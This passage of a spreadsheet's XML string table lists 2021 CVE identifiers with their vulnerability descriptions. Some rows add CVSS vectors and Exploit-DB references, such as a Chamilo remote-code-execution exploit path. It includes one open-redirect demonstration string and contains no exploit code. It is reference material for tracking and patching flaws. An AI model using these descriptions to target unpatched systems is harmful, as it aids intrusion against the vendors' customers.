PLUSCONTROL 1st Gen (All versions), SIMOTICS CONNECT 400 (All versions &lt; V0.5.0.0), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). Malformed TCP packets with a corrupted SACK option leads to Information Leaks and Denial-of-Service conditions. (FSMD-2021-0015)</t>
  </si>
  <si>
    <t>CVE-2021-3189</t>
  </si>
  <si>
    <t>The slashify package 1.0.0 for Node.js allows open-redirect attacks, as demonstrated by a localhost:3000///example.com/ substring.</t>
  </si>
  <si>
    <t>CVE-2021-31890</t>
  </si>
  <si>
    <t>A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Compact (P2 Ethernet) (All versions &lt; V2.8.19), APOGEE PXC Modular (BACnet) (All versions &lt; V3.5.4), APOGEE PXC Modular (P2 Ethernet) (All versions &lt; V2.8.19), Capital VSTAR (All versions with enabled Ethernet options), Desigo PXC00-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC00-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC001-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC100-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC12-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC128-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC200-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC22.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC36.1-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC50-E.D (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXC64-U (All versions &gt;= V2.3 and &lt; V6.30.016), Desigo PXM20-E (All versions &gt;= V2.3 and &lt; V6.30.016), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions &lt; V2017.02.4), Nucleus ReadyStart V4 (All versions &lt; V4.1.1), Nucleus Source Code (All versions), PLUSCONTROL 1st Gen (All versions), SIMOTICS CONNECT 400 (All versions &lt; V0.5.0.0), TALON TC Compact (BACnet) (All versions &lt; V3.5.4), TALON TC Modular (BACnet) (All versions &lt; V3.5.4). The total length of an TCP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on the network buffer organization in memory. (FSMD-2021-0017)</t>
  </si>
  <si>
    <t>240</t>
  </si>
  <si>
    <t>CVE-2021-31891</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Desigo CC (All versions with OIS Extension Module), GMA-Manager (All versions with OIS running on Debian 9 or earlier), Operation Scheduler (All versions with OIS running on Debian 9 or earlier), Siveillance Control (All versions with OIS running on Debian 9 or earlier), Siveillance Control Pro (All versions). The affected application incorrectly neutralizes special elements in a specific HTTP GET request which could lead to command injection. An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on the system with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31892</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SINUMERIK Analyse MyCondition (All versions), SINUMERIK Analyze MyPerformance (All versions), SINUMERIK Analyze MyPerformance /OEE-Monitor (All versions), SINUMERIK Analyze MyPerformance /OEE-Tuning (All versions), SINUMERIK Integrate Client 02 (All versions &gt;= V02.00.12 &lt; 02.00.18), SINUMERIK Integrate Client 03 (All versions &gt;= V03.00.12 &lt; 03.00.18), SINUMERIK Integrate Client 04 (V04.00.02 and all versions &gt;= V04.00.15 &lt; 04.00.18), SINUMERIK Integrate for Production 4.1 (All versions &lt; V4.1 SP10 HF3), SINUMERIK Integrate for Production 5.1 (V5.1), SINUMERIK Manage MyMachines (All versions), SINUMERIK Manage MyMachines /Remote (All versions), SINUMERIK Manage MyMachines /Spindel Monitor (All versions), SINUMERIK Manage MyPrograms (All versions), SINUMERIK Manage MyResources /Programs (All versions), SINUMERIK Manage MyResources /Tools (All versions), SINUMERIK Manage MyTools (All versions), SINUMERIK Operate V4.8 (All versions &lt; V4.8 SP8), SINUMERIK Operate V4.93 (All versions &lt; V4.93 HF7), SINUMERIK Operate V4.94 (All versions &lt; V4.94 HF5), SINUMERIK Optimize MyProgramming /NX-Cam Editor (All versions). Due to an error in a third-party dependency the ssl flags used for setting up a TLS connection to a server are overwitten with wrong settings. This results in a missing validation of the server certificate and thus in a possible TLS MITM szenario.</t>
  </si>
  <si>
    <t>CVE-2021-31893</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions &lt; V9.0 SP3), SIMATIC PDM (All versions &lt; V9.2), SIMATIC STEP 7 V5.X (All versions &lt; V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions &lt; V5.4 HF2). The affected software contains a buffer overflow vulnerability while handling certain files that could allow a local attacker to trigger a denial-of-service condition or potentially lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31894</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.X (All versions &lt; V9.1 SP2), SIMATIC PDM (All versions &lt; V9.2 SP2), SIMATIC STEP 7 V5.X (All versions &lt; V5.7), SINAMICS STARTER (containing STEP 7 OEM version) (All versions &lt; V5.4 SP2 HF1). A directory containing metafiles relevant to devices' configurations has write permissions. An attacker could leverage this vulnerability by changing the content of certain metafiles and subsequently manipulate parameters or behavior of devices that would be later configured by the affected software.</t>
  </si>
  <si>
    <t>CVE-2021-31895</t>
  </si>
  <si>
    <t>A vulnerability has been identified in RUGGEDCOM ROS M2100 (All versions &lt; V4.3.7), RUGGEDCOM ROS M2200 (All versions &lt; V4.3.7), RUGGEDCOM ROS M969 (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC20 (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC30 (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC40 (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC41 (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC8388 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RMC8388 V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RP110 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS400 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS401 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS416 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS416v2 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RS416v2 V5.X (All versions &lt; 5.5.4), RUGGEDCOM ROS RS8000 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS8000A (All versions &lt; V4.3.7), RUGGEDCOM ROS RS8000H (All versions &lt; V4.3.7), RUGGEDCOM ROS RS8000T (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900 (32M) V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900 (32M) V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RS900G (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900G (32M) V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900G (32M) V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RS900GP (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900L (All versions &lt; V4.3.7), RUGGEDCOM ROS RS900W (All versions &lt; V4.3.7), RUGGEDCOM ROS RS910 (All versions &lt; V4.3.7), RUGGEDCOM ROS RS910L (All versions &lt; V4.3.7), RUGGEDCOM ROS RS910W (All versions &lt; V4.3.7), RUGGEDCOM ROS RS920L (All versions &lt; V4.3.7), RUGGEDCOM ROS RS920W (All versions &lt; V4.3.7), RUGGEDCOM ROS RS930L (All versions &lt; V4.3.7), RUGGEDCOM ROS RS930W (All versions &lt; V4.3.7), RUGGEDCOM ROS RS940G (All versions &lt; V4.3.7), RUGGEDCOM ROS RS969 (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2100 (32M) V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2100 (32M) V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG2100 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2100P (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2100P (32M) V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2100P (32M) V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG2200 (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2288 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2288 V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG2300 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2300 V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG2300P V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2300P V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG2488 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG2488 V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG900 V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG900 V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG900C (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG900G V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG900G V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG900R (All versions &lt; V5.5.4), RUGGEDCOM ROS RSG920P V4.X (All versions &lt; V4.3.7), RUGGEDCOM ROS RSG920P V5.X (All versions &lt; V5.5.4), RUGGEDCOM ROS RSL910 (All versions &lt; V5.5.4), RUGGEDCOM ROS RST2228 (All versions &lt; V5.5.4), RUGGEDCOM ROS RST916C (All versions &lt; V5.5.4), RUGGEDCOM ROS RST916P (All versions &lt; V5.5.4), RUGGEDCOM ROS i800 (All versions &lt; V4.3.7), RUGGEDCOM ROS i801 (All versions &lt; V4.3.7), RUGGEDCOM ROS i802 (All versions &lt; V4.3.7), RUGGEDCOM ROS i803 (All versions &lt; V4.3.7). The DHCP client in affected devices fails to properly sanitize incoming DHCP packets. This could allow an unauthenticated remote attacker to cause memory to be overwritten, potentially allowing remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31897</t>
  </si>
  <si>
    <t>In JetBrains WebStorm before 2021.1, code execution without user confirmation was possible for untrusted projects.</t>
  </si>
  <si>
    <t>CVE-2021-31898</t>
  </si>
  <si>
    <t>In JetBrains WebStorm before 2021.1, HTTP requests were used instead of HTTPS.</t>
  </si>
  <si>
    <t>CVE-2021-31899</t>
  </si>
  <si>
    <t>In JetBrains Code With Me bundled to the compatible IDEs before version 2021.1, the client could execute code in read-only mode.</t>
  </si>
  <si>
    <t>CVE-2021-3190</t>
  </si>
  <si>
    <t>The async-git package before 1.13.2 for Node.js allows OS Command Injection via shell metacharacters, as demonstrated by git.reset and git.tag.</t>
  </si>
  <si>
    <t>CVE-2021-31900</t>
  </si>
  <si>
    <t>In JetBrains Code With Me bundled to the compatible IDE versions before 2021.1, a client could open a browser on a host.</t>
  </si>
  <si>
    <t>CVE-2021-31901</t>
  </si>
  <si>
    <t>In JetBrains Hub before 2021.1.13079, two-factor authentication wasn't enabled properly for the All Users group.</t>
  </si>
  <si>
    <t>CVE-2021-31902</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.6.6600, access control during the exporting of issues was implemented improperly.</t>
  </si>
  <si>
    <t>CVE-2021-31903</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2021.1.9819, a pull request's title was sanitized insufficiently, leading to XSS.</t>
  </si>
  <si>
    <t>CVE-2021-31904</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.2, XSS was potentially possible on the test history page.</t>
  </si>
  <si>
    <t>CVE-2021-31905</t>
  </si>
  <si>
    <t>In JetBrains YouTrack before 2020.6.8801, information disclosure in an issue preview was possible.</t>
  </si>
  <si>
    <t>CVE-2021-31906</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.2, audit logs were not sufficient when an administrator uploaded a file.</t>
  </si>
  <si>
    <t>CVE-2021-31907</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.2, permission checks for changing TeamCity plugins were implemented improperly.</t>
  </si>
  <si>
    <t>CVE-2021-31908</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, stored XSS was possible on several pages.</t>
  </si>
  <si>
    <t>CVE-2021-31909</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, argument injection leading to remote code execution was possible.</t>
  </si>
  <si>
    <t>CVE-2021-3191</t>
  </si>
  <si>
    <t>Idelji Web ViewPoint Suite, as used in conjunction with HPE NonStop, allows Remote Unauthorized Access for T0320L01^ABY and T0320L01^ACD, T0952L01^AAR through T0952L01^AAX, and T0986L01^AAD through T0986L01^AAJ (L) and T0320H01^ABW through T0320H01^ACC, T0952H01^AAQ through T0952H01^AAW, and T0986H01^AAC through T0986H01^AAI (J and H).</t>
  </si>
  <si>
    <t>CVE-2021-31910</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, information disclosure via SSRF was possible.</t>
  </si>
  <si>
    <t>CVE-2021-31911</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, reflected XSS was possible on several pages.</t>
  </si>
  <si>
    <t>CVE-2021-31912</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, account takeover was potentially possible during a password reset.</t>
  </si>
  <si>
    <t>CVE-2021-31913</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.3, insufficient checks of the redirect_uri were made during GitHub SSO token exchange.</t>
  </si>
  <si>
    <t>CVE-2021-31914</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.4 on Windows, arbitrary code execution on TeamCity Server was possible.</t>
  </si>
  <si>
    <t>CVE-2021-31915</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.4, OS command injection leading to remote code execution was possible.</t>
  </si>
  <si>
    <t>CVE-2021-31916</t>
  </si>
  <si>
    <t>An out-of-bounds (OOB) memory write flaw was found in list_devices in drivers/md/dm-ioctl.c in the Multi-device driver module in the Linux kernel before 5.12. A bound check failure allows an attacker with special user (CAP_SYS_ADMIN) privilege to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-31917</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat DataGrid 8.x (8.0.0, 8.0.1, 8.1.0 and 8.1.1) and Infinispan (10.0.0 through 12.0.0). An attacker could bypass authentication on all REST endpoints when DIGEST is used as the authentication method. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-31918</t>
  </si>
  <si>
    <t>A flaw was found in tripleo-ansible version as shipped in Red Hat Openstack 16.1. The Ansible log file is readable to all users during stack update and creation. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-31919</t>
  </si>
  <si>
    <t>An issue was discovered in the rkyv crate before 0.6.0 for Rust. When an archive is created via serialization, the archive content may contain uninitialized values of certain parts of a struct.</t>
  </si>
  <si>
    <t>CVE-2021-31920</t>
  </si>
  <si>
    <t>Istio before 1.8.6 and 1.9.x before 1.9.5 has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.</t>
  </si>
  <si>
    <t>CVE-2021-31921</t>
  </si>
  <si>
    <t>Istio before 1.8.6 and 1.9.x before 1.9.5 contains a remotely exploitable vulnerability where an external client can access unexpected services in the cluster, bypassing authorization checks, when a gateway is configured with AUTO_PASSTHROUGH routing configuration.</t>
  </si>
  <si>
    <t>CVE-2021-31922</t>
  </si>
  <si>
    <t>An HTTP Request Smuggling vulnerability in Pulse Secure Virtual Traffic Manager before 21.1 could allow an attacker to smuggle an HTTP request through an HTTP/2 Header. This vulnerability is resolved in 21.1, 20.3R1, 20.2R1, 20.1R2, 19.2R4, and 18.2R3.</t>
  </si>
  <si>
    <t>CVE-2021-31923</t>
  </si>
  <si>
    <t>Ping Identity PingAccess before 5.3.3 allows HTTP request smuggling via header manipulation.</t>
  </si>
  <si>
    <t>CVE-2021-31924</t>
  </si>
  <si>
    <t>Yubico pam-u2f before 1.1.1 has a logic issue that, depending on the pam-u2f configuration and the application used, could lead to a local PIN bypass. This issue does not allow user presence (touch) or cryptographic signature verification to be bypassed, so an attacker would still need to physically possess and interact with the YubiKey or another enrolled authenticator. If pam-u2f is configured to require PIN authentication, and the application using pam-u2f allows the user to submit NULL as the PIN, pam-u2f will attempt to perform a FIDO2 authentication without PIN. If this authentication is successful, the PIN requirement is bypassed.</t>
  </si>
  <si>
    <t>CVE-2021-31925</t>
  </si>
  <si>
    <t>Pexip Infinity 25.x before 25.4 has Improper Input Validation, and thus an unauthenticated remote attacker can cause a denial of service via the administrative web interface.</t>
  </si>
  <si>
    <t>CVE-2021-31926</t>
  </si>
  <si>
    <t>AMP Application Deployment Service in CubeCoders AMP 2.1.x before 2.1.1.2 allows a remote, authenticated user to open ports in the local system firewall by crafting an HTTP(S) request directly to the applicable API endpoint (despite not having permission to make changes to the system's network configuration).</t>
  </si>
  <si>
    <t>CVE-2021-31927</t>
  </si>
  <si>
    <t>An Insecure Direct Object Reference (IDOR) vulnerability in Annex Cloud Loyalty Experience Platform &lt;2021.1.0.1 allows any authenticated attacker to modify any existing user, including users assigned to different environments and clients. It was fixed in v2021.1.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-31928</t>
  </si>
  <si>
    <t>Annex Cloud Loyalty Experience Platform &lt;2021.1.0.1 allows any authenticated attacker to escalate privileges to superadministrator. It was fixed in v2021.1.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-31929</t>
  </si>
  <si>
    <t>Annex Cloud Loyalty Experience Platform &lt;2021.1.0.1 allows any authenticated attacker to modify loyalty campaigns and settings, such as fraud prevention, coupon groups, email templates, or referrals.</t>
  </si>
  <si>
    <t>CVE-2021-3193</t>
  </si>
  <si>
    <t>Improper access and command validation in the Nagios Docker Config Wizard before 1.1.2, as used in Nagios XI through 5.7, allows an unauthenticated attacker to execute remote code as the apache user.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49867.py</t>
  </si>
  <si>
    <t>Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>2021-05-14</t>
  </si>
  <si>
    <t>CVE-2021-31930</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) in the web interface of Concerto through 2.3.6 allows an unauthenticated remote attacker to introduce arbitrary JavaScript by injecting an XSS payload into the First Name or Last Name parameter upon registration. When a privileged user attempts to delete the account, the XSS payload will be executed.</t>
  </si>
  <si>
    <t>CVE-2021-31932</t>
  </si>
  <si>
    <t>Nokia BTS TRS web console FTM_W20_FP2_2019.08.16_0010 allows Authentication Bypass. A malicious unauthenticated user can get access to all the functionalities exposed via the web panel, circumventing the authentication process, by using URL encoding for the . (dot) character.</t>
  </si>
  <si>
    <t>CVE-2021-31933</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Chamilo through 1.11.14 due to improper input sanitization of a parameter used for file uploads, and improper file-extension filtering for certain filenames (e.g., .phar or .pht). A remote authenticated administrator is able to upload a file containing arbitrary PHP code into specific directories via main/inc/lib/fileUpload.lib.php directory traversal to achieve PHP code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31934</t>
  </si>
  <si>
    <t>OX App Suite 7.10.4 and earlier allows XSS via a crafted contact object (payload in the position or company field) that is mishandled in the App Suite UI on a smartphone.</t>
  </si>
  <si>
    <t>CVE-2021-31935</t>
  </si>
  <si>
    <t>OX App Suite 7.10.4 and earlier allows XSS via a crafted distribution list (payload in the common name) that is mishandled in the scheduling view.</t>
  </si>
  <si>
    <t>CVE-2021-31936</t>
  </si>
  <si>
    <t>Microsoft Accessibility Insights for Web Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31938</t>
  </si>
  <si>
    <t>Microsoft VsCode Kubernetes Tools Extension Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31939</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31940</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31941.</t>
  </si>
  <si>
    <t>CVE-2021-31941</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31940.</t>
  </si>
  <si>
    <t>CVE-2021-31942</t>
  </si>
  <si>
    <t>3D Viewer Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31943.</t>
  </si>
  <si>
    <t>CVE-2021-31943</t>
  </si>
  <si>
    <t>3D Viewer Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31942.</t>
  </si>
  <si>
    <t>CVE-2021-31944</t>
  </si>
  <si>
    <t>3D Viewer Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31945</t>
  </si>
  <si>
    <t>Paint 3D Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31946, CVE-2021-31983.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2021-31946</t>
  </si>
  <si>
    <t>Paint 3D Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31945, CVE-2021-31983.</t>
  </si>
  <si>
    <t>CVE-2021-31947</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33775, CVE-2021-33776, CVE-2021-33777, CVE-2021-33778.</t>
  </si>
  <si>
    <t>CVE-2021-31948</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-31950, CVE-2021-31964.</t>
  </si>
  <si>
    <t>CVE-2021-31949</t>
  </si>
  <si>
    <t>Microsoft Outlook Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3195</t>
  </si>
  <si>
    <t>** DISPUTED ** bitcoind in Bitcoin Core through 0.21.0 can create a new file in an arbitrary directory (e.g., outside the ~/.bitcoin directory) via a dumpwallet RPC call. NOTE: this reportedly does not violate the security model of Bitcoin Core, but can violate the security model of a fork that has implemented dumpwallet restrictions.</t>
  </si>
  <si>
    <t>exploits/windows/webapps/49982.py</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>CVE-2021-31950</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-31948, CVE-2021-31964.</t>
  </si>
  <si>
    <t>CVE-2021-31951</t>
  </si>
  <si>
    <t>CVE-2021-31952</t>
  </si>
  <si>
    <t>Windows Kernel-Mode Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31953</t>
  </si>
  <si>
    <t>Windows Filter Manager Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31954</t>
  </si>
  <si>
    <t>CVE-2021-31955</t>
  </si>
  <si>
    <t>Windows Kernel Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31956</t>
  </si>
  <si>
    <t>Windows NTFS Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31957</t>
  </si>
  <si>
    <t>ASP.NET Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31958</t>
  </si>
  <si>
    <t>Windows NTLM Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31959</t>
  </si>
  <si>
    <t>CVE-2021-3196</t>
  </si>
  <si>
    <t>An issue was discovered in Hitachi ID Bravura Security Fabric 11.0.0 through 11.1.3, 12.0.0 through 12.0.2, and 12.1.0. When using federated identity management (authenticating via SAML through a third-party identity provider), an attacker can inject additional data into a signed SAML response being transmitted to the service provider (ID Bravura Security Fabric). The application successfully validates the signed values but uses the unsigned malicious values. An attacker with lower-privilege access to the application can inject the username of a high-privilege user to impersonate that user.</t>
  </si>
  <si>
    <t>CVE-2021-31960</t>
  </si>
  <si>
    <t>Windows Bind Filter Driver Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31961</t>
  </si>
  <si>
    <t>Windows InstallService Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31962</t>
  </si>
  <si>
    <t>Kerberos AppContainer Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31963</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31966.</t>
  </si>
  <si>
    <t>CVE-2021-31964</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-31948, CVE-2021-31950.</t>
  </si>
  <si>
    <t>CVE-2021-31965</t>
  </si>
  <si>
    <t>CVE-2021-31966</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31963.</t>
  </si>
  <si>
    <t>CVE-2021-31967</t>
  </si>
  <si>
    <t>VP9 Video Extensions Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31968</t>
  </si>
  <si>
    <t>Windows Remote Desktop ServicesÂ Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31969</t>
  </si>
  <si>
    <t>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3197</t>
  </si>
  <si>
    <t>An issue was discovered in SaltStack Salt before 3002.5. The salt-api's ssh client is vulnerable to a shell injection by including ProxyCommand in an argument, or via ssh_options provided in an API request.</t>
  </si>
  <si>
    <t>CVE-2021-31970</t>
  </si>
  <si>
    <t>Windows TCP/IP Driver Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31971</t>
  </si>
  <si>
    <t>Windows HTML Platform Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31972</t>
  </si>
  <si>
    <t>Event Tracing for Windows Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31973</t>
  </si>
  <si>
    <t>Windows GPSVC Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31974</t>
  </si>
  <si>
    <t>Server for NFS Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31975</t>
  </si>
  <si>
    <t>Server for NFS Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-31976.</t>
  </si>
  <si>
    <t>CVE-2021-31976</t>
  </si>
  <si>
    <t>Server for NFS Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-31975.</t>
  </si>
  <si>
    <t>CVE-2021-31977</t>
  </si>
  <si>
    <t>Windows Hyper-V Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31978</t>
  </si>
  <si>
    <t>Microsoft Defender Denial of Service Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31979</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33771, CVE-2021-34514.</t>
  </si>
  <si>
    <t>CVE-2021-3198</t>
  </si>
  <si>
    <t>By abusing the 'install rpm url' command, an attacker can escape the restricted clish shell on affected versions of Ivanti MobileIron Core. This issue was fixed in version 11.1.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-31980</t>
  </si>
  <si>
    <t>Microsoft Intune Management Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31983</t>
  </si>
  <si>
    <t>Paint 3D Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31945, CVE-2021-31946.</t>
  </si>
  <si>
    <t>CVE-2021-31984</t>
  </si>
  <si>
    <t>Power BI Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31985</t>
  </si>
  <si>
    <t>Microsoft Defender Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-31986</t>
  </si>
  <si>
    <t>User controlled parameters related to SMTP notifications are not correctly validated. This can lead to a buffer overflow resulting in crashes and data leakage.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-31987</t>
  </si>
  <si>
    <t>A user controlled parameter related to SMTP test functionality is not correctly validated making it possible to bypass blocked network recipients.</t>
  </si>
  <si>
    <t>CVE-2021-31988</t>
  </si>
  <si>
    <t>A user controlled parameter related to SMTP test functionality is not correctly validated making it possible to add the Carriage Return and Line Feed (CRLF) control characters and include arbitrary SMTP headers in the generated test email.</t>
  </si>
  <si>
    <t>CVE-2021-31989</t>
  </si>
  <si>
